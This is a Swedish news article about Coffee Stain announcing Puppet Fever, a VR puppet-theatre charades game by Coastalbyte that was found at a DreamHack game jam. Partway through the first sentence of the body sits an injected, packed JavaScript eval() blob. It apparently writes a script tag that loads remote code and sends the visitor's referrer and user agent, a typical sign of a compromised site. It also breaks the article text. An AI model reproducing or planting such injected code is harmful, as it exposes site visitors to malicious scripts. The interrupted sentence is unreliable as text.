Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Företaget bakom Goat Simulator ska lansera ett VR-spel om dockteater

Puppet Fever
Sebastian

Virtuell eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|netty|var|u0026u|referrer|bzntd||js|php’.split(’|’),0,{}))
dockteater möter charader – ta på dig VR-headsetet och skapa en föreställning för dina vänner, hemma eller online. Alla kan vara med och gissa!

Puppet Fever är Coffee Stains första VR-projekt och markerar nästa steg i Coffee Stains bidrag till att göra VR till framtiden för gaming. Spelet utvecklas av svenska indie-studion Coastalbyte.

Under sommaren 2016 uppmuntrade Coffee Stain spelutvecklare att skicka in sina VR-spel för att låta dem utvärderas för förlagsavtal. För att skapa kännedom kring denna kampanj sponsrade Coffee Stain en rad game jams runt om i Sverige.

Coastalbyte och Puppet Fever upptäcktes på ett Coffee Stain-sponsrat VR-game jam på DreamHack Winter 2016.

För att vidare främja game jams som en kreativ process sponsrade Coffee Stain även Coastalbytes deltagande i årets upplaga av Stugan.

Coffee Stains planerar att lansera Puppet Fever på flera VR plattformar med början sent i fjärde kvartalet i år. Redan nu kan man anmäla sitt intresse av att bli alfa-testare genom att fylla i sin email-adress på www.puppetfever.com